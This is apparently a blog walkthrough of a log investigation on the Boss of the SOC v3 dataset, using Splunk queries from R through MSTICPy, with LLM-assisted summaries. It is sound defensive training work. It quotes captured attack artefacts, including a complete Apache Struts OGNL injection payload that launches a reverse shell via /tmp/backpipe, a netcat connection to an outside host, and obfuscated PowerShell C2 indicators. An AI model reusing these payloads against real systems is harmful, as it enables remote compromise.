This article documents an example approach for conducting log investigations using Splunk. As a demonstration, it utilizes the publicly available Boss of the SOC v3 dataset, indexed under the name botsv3.
Before beginning the investigation, we verify whether we can retrieve data via the Splunk API. To do this, we use MSTICPy, a Python module provided by Microsoft, as a wrapper. Since I’m an R user, I will access MSTICPy through the Reticulate package in R.
pacman::p_load(tidyverse, reticulate)
mp <- import("msticpy")
qry_splunk <- mp$QueryProvider("Splunk")
qry_splunk$connect()

Credential loading from msticpyconfig.yaml file.
username/password method is selected.
Connected.
The connection was successful.
Next, let’s send a basic query to a built-in dataset and print the result as a data frame.
MSTICPy automatically converts table results into Pandas DataFrames, which can be handled natively in R via Reticulate.
spl <- r"(
| inputlookup security_example_data.csv
| table timestamp threat_src_ip threat_dest_ip threat_status threat_type
| head 5
)"
df_1st <- qry_splunk$exec_query(spl, timeout=300)
df_1st

The query result is successfully displayed as a data frame. Note that all field types returned via the Splunk API are strings; this is a known Splunk-side limitation.
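Because every column comes back as a string, any numeric or time-based work needs an explicit conversion first. As a minimal sketch in the pandas layer that MSTICPy returns (before Reticulate hands it to R), with illustrative column values rather than real query output:

```python
import pandas as pd

# All values arrive from the Splunk API as strings.
df = pd.DataFrame({
    "count": ["3", "12"],
    "_time": ["1534761600", "1534765200"],  # epoch seconds as text
})

# Convert explicitly before doing arithmetic or time math.
df["count"] = pd.to_numeric(df["count"])
df["_time"] = pd.to_datetime(pd.to_numeric(df["_time"]), unit="s", utc=True)

print(df.dtypes)
```

The R pipelines later in this article do the same thing with `as.integer()` and `as_datetime()`.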
With everything working, we can now move on to the actual investigation.
# Distinguish Markdown strings output by AI from body text
ai_out <- function(x){
ai_block <- paste0(
"::: {.callout-tip title='AI output'}\n\n",
x,
"\n\n:::"
)
ai_block |> knitr::asis_output()
}
# Create interactive tables
pacman::p_load(DT)
create_dt <- function(x){
DT::datatable(
x,
filter = 'top',
options = list(
autoWidth = TRUE,
scrollX = TRUE,
scrollY = "400px",
dom = 'Blfrtip',
buttons = c('copy', 'csv', 'excel', 'pdf', 'print')
),
extensions = 'Buttons'
)
}

At this point, we have no prior knowledge of what types of events are recorded in the dataset. (While the official site lists sourcetypes, that’s all.)
We begin by listing host and sourcetype fields, along with event counts and the timestamps for first and last appearances. These initial insights may offer a foundation for further analysis.
spl <- r"(
search index=botsv3 earliest=0
| stats count, earliest(_time) as first_seen,
latest(_time) as last_seen by host, sourcetype
)"
df_host <- qry_splunk$exec_query(spl, timeout=300)
df_host_m <-
df_host |>
as_tibble() |>
mutate(
count = as.integer(count),
first_seen = as.double(first_seen) |> as_datetime(tz = "UTC"),
last_seen = as.double(last_seen) |> as_datetime(tz = "UTC")
)
create_dt(df_host_m)

There are about 30 unique hosts in the dataset. For example, those whose names end with “-L” are likely Windows workstations. To explore this kind of pattern more thoroughly, we can let OpenAI suggest possible interpretations.
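Before (or alongside) asking an LLM, the same naming patterns can be probed deterministically. The sketch below is a hypothetical rule-based classifier built from conventions visible in this host list (the `-L` suffix, EC2-style `ip-…` names, and `i-…` instance IDs); the rules are assumptions, not ground truth about the dataset:

```python
import re

def classify_host(host: str) -> str:
    """Guess a host's role from naming conventions seen in botsv3.

    Heuristics only: these patterns are inferred from the host list,
    not authoritative facts about the environment.
    """
    if host.upper().endswith("-L"):
        return "Windows workstation"
    if re.match(r"^ip-\d+-\d+-\d+-\d+", host):
        return "AWS EC2 (private DNS name)"
    if re.search(r"\bi-[0-9a-f]{8,17}\b", host):
        return "AWS EC2 instance"
    return "Unknown"

print(classify_host("FYODOR-L"))        # Windows workstation
print(classify_host("ip-172-16-0-13"))  # AWS EC2 (private DNS name)
```

A deterministic pass like this gives a stable baseline; the LLM is then only needed for the hosts the rules leave as Unknown.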
csv_host <-
df_host_m |>
select(host, sourcetype) |>
format_csv()
q_ai <- str_c(
"Please classify the following data based on the pattern of the host field.
If the sourcetype field suggests the type of operating system or environment,
include that information as well. Output one line per host in the format:
[Category], [Host Name], [Additional Information]
If the category is unclear, label it as Unknown.",
"Data:\n",
csv_host)
pacman::p_load(ellmer)
chat <- chat_openai(model = "gpt-4o-mini")
ans <- chat$chat(q_ai, echo = "none")
ai_out(ans)

Here is the classified data based on the specified criteria:
Windows, ABUNGST-L, Windows
Windows, BGIST-L, Windows
Windows, BSTOLL-L, Windows
Windows, BTUN-L, Windows
Firewall, FROTHLY-FW1, Cisco ASA
Windows, FYODOR-L, Windows
Windows, JWORTOS-L, Windows
Windows, MKRAEUS-L, Windows
Unknown, OD-FM-NA-i-0ad2d665d4bdace22.amazonaws.com, Unknown
Windows, PCERF-L, Windows
Windows, SEPM, Symantec Endpoint Protection
Unknown, console.us.code42.com:443, Unknown
Unix, gacrux.i-06fea586f3d3c8ce8, Unix
Unix, gacrux.i-0920036c8ca91e501, Unix
Unix, gacrux.i-09cbc261e84259b54, Unix
Unix, gacrux.i-0cc93bade2b3cba63, Unix
Unix, hoth, Unix
Unknown, ip-172-16-0-109.ec2.internal, Unknown
Unknown, ip-172-16-0-127, Unknown
Unknown, ip-172-16-0-13, Unknown
Unknown, ip-172-16-0-145, Unknown
Unknown, ip-172-16-0-178, Unknown
Unknown, ip-172-31-12-76, Unknown
Unknown, ip-172-31-36-235, Unknown
Unix, mars.i-08e52f8b5a034012d, Unix
Unknown, matar, Unknown
Unknown, ntesla, Unknown
Unknown, serverless, AWS
Unknown, splunk.froth.ly, AWS
Unknown, splunkhwf.froth.ly, Unknown
This output provides a clear categorization based on the host names and their respective information derived from the sourcetype field. Each line follows the given format of [Category], [Host Name], [Additional Information].
ans <- chat$chat("What kind of data is associated with the host named splunk.froth.ly?",
echo = "none")
ai_out(ans)

The host named splunk.froth.ly is associated with a variety of data types, which suggests that the host is utilized for monitoring and logging activities across multiple AWS and Microsoft services.
This gave us sufficient insight into the host and sourcetype fields, so we can now move on to the next step of the investigation.
To examine user behavior, we start with sign-in logs. The sourcetype ms:aad:signin contains entries related to Azure Active Directory sign-ins. We can look at the types of sign-ins, how often they occur, and who performed them.
As a first step, we take a summary to check which fields might be useful for analysis.
spl <- r"(
search index=botsv3 earliest=0
sourcetype="ms:aad:signin"
| fieldsummary
)"
df_aadsignin_sum <- qry_splunk$exec_query(spl, timeout=300)
create_dt(df_aadsignin_sum)

There are two versions of the API used to retrieve Azure AD sign-in logs: version 1.0 and Beta. It appears that version 1.0 is used here, which provides a limited set of fields. For instance, we would at least like to know the Autonomous System Number (ASN) of the source IP address, but that information is not included.
Since this Splunk environment does not have an enrichment app installed, we prepare to perform enrichment manually using an external service such as ip-api.
pacman::p_load(httr2)
get_asn <- function(ip) {
url <- str_glue("http://ip-api.com/json/{ip}?fields=as")
resp <- tryCatch(
request(url) |> req_throttle(rate = 4/10) |>
req_perform() |> resp_body_json(),
error = function(e) return(list(as = NA))
)
resp$as
}
spl <- r"(
search index=botsv3 earliest=0
sourcetype="ms:aad:signin"
| fields src_ip
| dedup src_ip
| table src_ip
| sort 0 src_ip
)"
df_src <- qry_splunk$exec_query(spl, timeout=300)
df_src_enriched <-
df_src |>
mutate(asn = map_chr(src_ip, get_asn)) |>
mutate(asn = if_else(asn == "", "--", asn))
df_src_enriched

At this point, it seems that some IP addresses still cannot be resolved to ASNs.
To further investigate sign-in behavior by src_ip, we can use the values() function to gather unique values per IP address. As this function returns multi-value fields, they appear as lists in data frames obtained via the API. We must unnest these lists to access individual elements.
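On the pandas side, a multi-value field arrives as a list-valued column. The sketch below shows the flattening step in isolation, with invented values; it mirrors what the R pipeline later does with `map_chr()` and `str_c(collapse = " | ")`:

```python
import pandas as pd

# values(user) etc. come back as list-valued cells (multi-value fields).
df = pd.DataFrame({
    "src_ip": ["104.207.83.63"],
    "values(user)": [["bgist", "fyodor"]],  # illustrative values
})

# Collapse each list into one delimited string so the column
# behaves like ordinary text in later joins and filters.
df["values(user)"] = df["values(user)"].apply(lambda v: " | ".join(v))

print(df.loc[0, "values(user)"])  # bgist | fyodor
```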
spl <- r"(
search index=botsv3 earliest=0
sourcetype="ms:aad:signin"
| table _time, app, user, src_ip, location.country, loginStatus, deviceInformation
| stats values(*), earliest(_time) as first_seen, latest(_time) as last_seen by src_ip
)"
df_aadsignin <- qry_splunk$exec_query(spl, timeout=300)
df_aad_enriched <-
df_aadsignin |>
mutate(
first_seen = as.double(first_seen) |> as_datetime(tz = "UTC"),
last_seen = as.double(last_seen) |> as_datetime(tz = "UTC")
) |>
janitor::clean_names() |>
mutate(across(
starts_with("values_"),
~ map_chr(.x, ~ str_c(.x, collapse = " | "))
)) |>
rename_with(~ str_remove(.x, "^values_"), starts_with("values_")) |>
inner_join(df_src_enriched, by = "src_ip") |>
select(src_ip, location_country, first_seen, last_seen, asn, user, device_information, login_status, app)
create_dt(df_aad_enriched)

The first row in our summary highlights src_ip = 104.207.83.63 (located in Hong Kong), which is worth closer attention. According to the device_information field, this IP is uniquely associated with Windows 7, and shows an unusual string: aBrowswer 3.5.
Also notable are src_ip = 157.97.121.132 and src_ip = 199.66.91.253, each of which is used to sign in by two different users. Altogether, these three IP addresses are associated with four accounts: bgist, fyodor, bstoll, and klagerfield.
Let’s examine the sign-in histories of these users in more detail.
spl <- r"(
search index=botsv3 earliest=0
sourcetype="ms:aad:signin"
src_ip IN ("104.207.83.63", "157.97.121.132", "199.66.91.253")
| table _time, app, user, src_ip, location.country, loginStatus, deviceInformation
| sort _time
)"
df_aadsignin2 <- qry_splunk$exec_query(spl, timeout=300)
df_aadsignin2 <-
df_aadsignin2 |>
janitor::clean_names() |>
mutate(time = as_datetime(time))
create_dt(df_aadsignin2)

In the sign-in log, we observed events from suspicious IP addresses where the app was listed as Exchange Online. This raises the possibility of unauthorized email activity, prompting us to examine the Message Trace Logs.
The sourcetype ms:o365:reporting:messagetrace provides detailed information about email transmission. We’ll investigate who is sending what, and to whom.
spl <- r"(
search index=botsv3 earliest=0
sourcetype="ms:o365:reporting:messagetrace"
src IN ("104.207.83.63", "157.97.121.132", "199.66.91.253")
| table _time, size, src, orig_src, orig_recipient, subject, action, MessageTraceId
| sort _time
)"
df_msgt <- qry_splunk$exec_query(spl, timeout=300)
df_msgt <-
df_msgt |>
as_tibble() |>
janitor::clean_names() |>
mutate(time = as_datetime(time))
create_dt(df_msgt)

This helps us understand message flow and detect any suspicious communications.
The account bgist appears to have sent emails to other internal users. Among the two types of subjects observed, the first—“Draft Financial Plan for Brewery FY2019”—was initially quarantined, suggesting the message may have included an attachment based on its size. When the message was delivered a second time, the size had noticeably decreased, implying that the attacker might have switched to a link-based tactic instead of using an attachment.
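The size-drop observation can also be checked mechanically rather than by eye. A hypothetical sketch: group message-trace rows by subject and flag subjects whose later delivery is markedly smaller than the first. The sizes and threshold below are invented for illustration:

```python
import pandas as pd

# Illustrative message-trace rows (sizes in bytes are invented).
df = pd.DataFrame({
    "subject": ["Draft Financial Plan for Brewery FY2019"] * 2 + ["Lunch?"],
    "time": pd.to_datetime(["2018-08-20 10:00", "2018-08-20 10:30",
                            "2018-08-20 11:00"], utc=True),
    "size": [2_500_000, 12_000, 8_000],
})

# For each subject, compare the first and last observed sizes.
g = (df.sort_values("time")
       .groupby("subject")["size"]
       .agg(first="first", last="last"))

# Flag subjects whose size collapsed (e.g. attachment swapped for a link).
suspicious = g[g["last"] < 0.1 * g["first"]]
print(suspicious.index.tolist())
```

The same grouping could be run over `df_msgt` in R with `group_by(subject)` and `summarise()`.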
Unified audit logs can be queried via the sourcetype o365:management:activity. Here, we extract events related to the three suspicious IP addresses mentioned earlier to investigate what actions were taken and by whom.
spl <- r"(
search index=botsv3 earliest=0
sourcetype="o365:management:activity"
("104.207.83.63" OR "157.97.121.132" OR "199.66.91.253")
| table _time, src, action, command, authentication_service, file_name, record_type, user_id, user_agent
| sort _time
)"
df_ual <- qry_splunk$exec_query(spl, timeout=300)
df_ual <-
df_ual |>
as_tibble() |>
janitor::clean_names() |>
mutate(time = as_datetime(time))
create_dt(df_ual)

Several findings are noteworthy:

- The user_agent field for IP address 104.207.83.63 includes the string ko-KP, which may suggest a North Korean locale.
- fyodor downloaded a file named archive.tar from IP 199.66.91.253.
- Administrative activity is attributed to fyodor, indicated by the ExchangeAdmin record type.

Using the three key log sources (sign-in logs, message trace logs, and unified audit logs), we now visualize activity involving the two most suspicious IP addresses (104.207.83.63 and 199.66.91.253) by plotting user and src_ip together.
pacman::p_load(scales)
df_msgt_pr <-
df_msgt |>
janitor::clean_names() |>
select(time, src, orig_src) |>
rename(user = orig_src, src_ip = src) |>
mutate(
time = as_datetime(time, tz = "UTC"),
log_src = "message"
)
df_aad_pr <-
df_aadsignin2 |>
janitor::clean_names() |>
filter(src_ip %in% c("104.207.83.63", "199.66.91.253")) |>
select(time, src_ip, user) |>
mutate(
time = as_datetime(time, tz = "UTC"),
log_src = "aad"
)
df_ual_pr <-
df_ual |>
janitor::clean_names() |>
rename(user = user_id) |>
mutate(
time = as_datetime(time, tz = "UTC"),
src_ip = str_split_i(src, ":", 1),
log_src = "ual"
) |>
select(time, user, src_ip, log_src)
df_m365_tmp <-
df_aad_pr |>
bind_rows(df_msgt_pr) |>
bind_rows(df_ual_pr)
p_m365 <-
df_m365_tmp |>
group_by(user) |>
mutate(first_seen = min(time)) |>
ungroup() |>
ggplot(mapping = aes(x = time, y = reorder(user, desc(first_seen)),
shape = src_ip, color = log_src)) +
geom_point(alpha = 0.4, size = 2) +
scale_x_datetime(breaks = breaks_width("30 min"),
minor_breaks = breaks_width("5 min"),
labels = label_time("%H:%M")) +
labs(x = "2018-08-20 (UTC)", y = "")
p_m365
A file named archive.tar appears multiple times in the logs. We extract related events and examine them for suspicious behavior.
spl <- r"(
search index=botsv3 earliest=0
sourcetype=xmlwineventlog TERM(archive.tar)
| table _raw
)"
df_archive <- qry_splunk$exec_query(spl, timeout=300)
str_archive <- df_archive |> flatten_chr()
df_archive

This file was captured and logged in Sysmon. Instead of manually parsing the XML entries for details, we leverage OpenAI to extract key information from the event data directly.
q_ai <- str_c(
"I am investigating a possible security breach and have confirmed that the
file archive.tar was downloaded.
Does this XML event data indicate that archive.tar was generated or related to that activity? ",
"Data: \n",
str_archive)
chat <- chat_openai(model = "gpt-4o-mini")
ans <- chat$chat(q_ai, echo = "none")
ai_out(ans)The XML event data you provided indicates that the file archive.tar was indeed generated as part of a command executed on the system. Here are the relevant details extracted from the event data:
Process Information: The event describes a process running tar.exe, which is a utility often used for archiving files.
Command Line: C:\Windows\system32\tar.exe -cvzf archive.tar *. This indicates that the tar command was run with the options:

- -c: create a new archive
- -v: verbose output (show progress in the terminal)
- -z: compress the archive using gzip
- -f archive.tar: specify the name of the output file

Current Directory: The command was executed from the directory C:\Users\FyodorMalteskesko\OneDrive - Frothly\.
User Context: The command was executed by the NT AUTHORITY\SYSTEM user, which indicates it ran with elevated privileges.
Parent Process: The parent process that started this command was powershell.exe, which indicates that a PowerShell script or command initiated the tar command.
Timestamp: The event occurred on 2018-08-20T11:52:16.678737700Z, which is critical for tracking the timeline of potential malicious activity.
Based on the provided data, it is evident that the archive.tar file was generated as part of a command that executed the tar archiving tool. If you are investigating a security breach, this event could be significant. You should consider investigating the context and purpose of the command, especially the usage of PowerShell, as it is often utilized for various legitimate and malicious purposes. Moreover, checking for potential unauthorized access or additional suspicious behavior surrounding this event would be prudent.
Given that the parent process was PowerShell, we suspect the possibility of remote control. To investigate further, we search the Windows Event Logs on the host FYODOR-L for any entries containing the keyword FromBase64String.
spl <- r"(
search index=botsv3 earliest=0
sourcetype=WinEventLog
host="FYODOR-L" FromBase64String
| table _raw
)"
df_fydorl_base64 <- qry_splunk$exec_query(spl, timeout=300)
str_fydorl_base64 <- df_fydorl_base64 |> flatten_chr()
q_ai <- str_c(
"On the endpoint FYODOR-L, I searched Windows event logs for entries containing
the keyword FromBase64String and obtained the following data.
Please summarize what this data indicates, and extract any potentially useful
indicators of compromise (IOCs), such as IP addresses or suspicious keywords. ",
"Data: \n",
str_fydorl_base64)
chat <- chat_openai(model = "gpt-4o-mini")
ans <- chat$chat(q_ai, echo = "none")
ai_out(ans)

Based on the Windows Event Logs retrieved from the endpoint FYODOR-L, there are multiple instances of suspicious PowerShell activity, specifically involving the use of the FromBase64String method, which is commonly associated with obfuscating malicious code.
Execution of Obfuscated PowerShell Scripts: The logs reveal a series of PowerShell commands that manipulate group policy settings related to script block logging. This suggests an attempt to disable security features that would normally log script activity, making it easier for malicious activities to occur without detection.
Malware Communication: Several script blocks appear to set up a WebClient object that potentially communicates with a remote server to download data or execute commands, highlighted by lines of code that set user agents and include requests to paths like /news.php and /login/process.php. This behavior is characteristic of Command and Control (C2) communication.
Base64 Encoded Strings: The scripts contain Base64 encoded strings, which are being decoded and executed, indicating that the commands are intentionally obscured to evade detection.
Scheduled Tasks: Multiple logs indicate that tasks are being created with PowerShell commands scheduled to execute at specific intervals, which is a technique often used by persistent malware to maintain control over the infected system.
Unusual User Agents: The usage of non-standard user agents in the HTTP requests suggests attempts to evade security measures or mimic legitimate traffic.
- Command Line Strings: IEX (Invoke-Expression) alongside Base64 strings is concerning.
- Obfuscated Keywords: Keywords like EnableScriptBlockLogging=0, SetValue($null, Expect100Continue=0, and ServerCertificateValidationCallback suggest manipulation of security features.
- Scripts that Disable Security:
- URLs: /news.php, /login/process.php, /admin/get.php
- User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko - this typical user agent is used in many web requests and could be used to discern legitimate from malicious requests based on traffic analysis.
- Process Creation: FromBase64String and IEX.

Unfortunately, OpenAI sometimes fails to extract the correct IP address from the event logs. While a one-byte difference may seem minor to a language model, it can make a significant difference when identifying indicators of compromise (IOCs).
Note that, depending on the run, OpenAI may sometimes extract the correct IP address. This highlights that its output is not always stable or consistent.
b64str <- "aAB0AHQAcABzADoALwAvADQANQAuADcANwAuADUAMwAuADEANwA2ADoANAA0ADMA"
rawstr <- jsonlite::base64_dec(b64str)
raw_clean <- rawstr[rawstr != as.raw(0x00)]
rawToChar(raw_clean)

[1] "https://45.77.53.176:443"
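The same decoding can be done in Python. The encoded string is UTF-16LE (PowerShell's native string encoding), which is why the R version has to strip the interleaved null bytes; decoding with the right codec makes that step unnecessary:

```python
import base64

b64str = "aAB0AHQAcABzADoALwAvADQANQAuADcANwAuADUAMwAuADEANwA2ADoANAA0ADMA"

# PowerShell encodes strings as UTF-16LE before base64-encoding them,
# so decode with that codec instead of removing null bytes by hand.
decoded = base64.b64decode(b64str).decode("utf-16-le")
print(decoded)  # https://45.77.53.176:443
```

Deterministic decoding like this is the reliable way to recover IOCs; the LLM is better reserved for summarizing context around them.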
IP address 45.77.53.176 appears across several entries. We investigate its connections and the context of its appearance.
spl <- r"(
search index=botsv3 earliest=0
TERM(45.77.53.176)
| stats count by host
| sort 0 -count
)"
df_host_45 <- qry_splunk$exec_query(spl, timeout=300)
df_host_45

Some hosts, such as splunkhwf and SEPM, seem to use it in a logging context, but others, including FYODOR-L and ABUNGST-L, appear to be communicating with this IP in what looks like potential command-and-control (C2) beaconing activity. The roles of hoth and matar remain unclear.
In a previous example, although the port number was 443, the protocol used was HTTP. This prompts us to check the stream:http sourcetype as well. Below, we display just the first matching entry.
spl <- r"(
search index=botsv3 earliest=0
TERM(45.77.53.176)
sourcetype="stream:http"
| head 1
| table *
)"
df_http_45 <- qry_splunk$exec_query(spl, timeout=300)
df_http_45 |>
janitor::clean_names() |>
select(time, src_ip, dest_ip, dest_port, uri_path, http_method, http_user_agent, form_data) |>
pivot_longer(everything(), names_to = "field", values_to = "value") |>
knitr::kable()

| field | value |
|---|---|
| time | 2018-08-20T11:34:01.509+00:00 |
| src_ip | 192.168.8.103 |
| dest_ip | 192.168.9.30 |
| dest_port | 8080 |
| uri_path | /frothlyinventory/integration/saveGangster.action |
| http_method | POST |
| http_user_agent | python-requests/2.18.4 |
| form_data | age=1&__checkbox_bustedBefore=true&name=${(#szgx='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='/bin/sh 0/tmp/backpipe').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.close())}&description=1 |
From the observed traffic, it appears that a reverse shell was being attempted against 45.77.53.176 by exploiting an Apache Struts vulnerability. Evidence from OSQuery logs suggests that this attempt was successful.
spl <- r"(
search index=botsv3 earliest=0
host=hoth sourcetype="osquery:results"
"45.77.53.176"
| head 1
| fields - _raw, date*, ssl*
| table *
)"
df_osq_45 <- qry_splunk$exec_query(spl, timeout=300)
df_osq_45 |>
as_tibble() |>
janitor::clean_names() |>
select(time, action, columns_cmdline, columns_owner_uid, columns_path, columns_pid, columns_parent) |>
rename_with(~ str_remove(.x, "^columns_"), starts_with("columns_")) |>
pivot_longer(everything(), names_to = "field", values_to = "value") |>
knitr::kable()

| field | value |
|---|---|
| time | 2018-08-20T11:34:49.000+00:00 |
| action | added |
| cmdline | "nc" "45.77.53.176" "8088" |
| owner_uid | 0 |
| path | /bin/nc.traditional |
| pid | 17211 |
| parent |
(To Be Continued…)
This walkthrough showcased how to approach an incident investigation using Splunk, MSTICPy, and R.
I call this kind of writing—where thoughts, code, and results are integrated into a cohesive narrative—“literary log analysis.” The idea was inspired years ago by Masaru Nagaku’s talk on “literary computing”, and I’ve long wanted to apply the concept to log analysis. In recent years, key tools like MSTICPy and Quarto have made this approach not only feasible but also accessible.
One advantage of performing the analysis in an RStudio Server environment is the flexibility to work with data sources beyond Splunk—such as Microsoft Sentinel, Elasticsearch, or even plain text files. Moreover, Quarto supports execution of both Python and Bash code chunks, which means you can preprocess JSON with jq and then convert the results back into a data frame.
By querying various log sources—from sign-ins to email and IP traffic—we were able to piece together behavioral patterns and indicators of compromise. The Boss of the SOC dataset provides a rich environment for practicing realistic threat hunting and log analysis skills.
Notes and Considerations:
Not every log analysis task needs to be conducted in a literary style. This approach can be time-consuming, so it’s best to apply it to investigations that warrant thorough documentation or future reference.
Even when using a markdown-based workflow, it’s important not to rely solely on that format. Personally, I also use web consoles, R scripts, and—perhaps most importantly—hand-drawn sketches and notebooks to clarify my thinking.
When dealing with large volumes of search results (such as long time ranges), it may be more efficient to export the results as a CSV file and then load it into a data frame, bypassing MSTICPy entirely.
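As a sketch of that bypass route, assuming the results were exported from the Splunk search UI as a CSV file (the file contents below are invented stand-ins), loading them with explicit time parsing looks like this in Python's pandas; in R, readr::read_csv plays the same role:

```python
import io
import pandas as pd

# Stand-in for an exported results CSV; in practice you would
# pass the file path to pd.read_csv instead of a StringIO buffer.
csv_text = """_time,host,count
2018-08-20T11:34:01.509+00:00,FYODOR-L,42
2018-08-20T11:52:16.678+00:00,hoth,7
"""

df = pd.read_csv(io.StringIO(csv_text))

# read_csv infers numeric columns on its own, but timestamps
# should still be parsed explicitly into tz-aware datetimes.
df["_time"] = pd.to_datetime(df["_time"], utc=True)

print(df.dtypes)
```

For large result sets this avoids holding the API connection open and keeps the heavy search work inside Splunk.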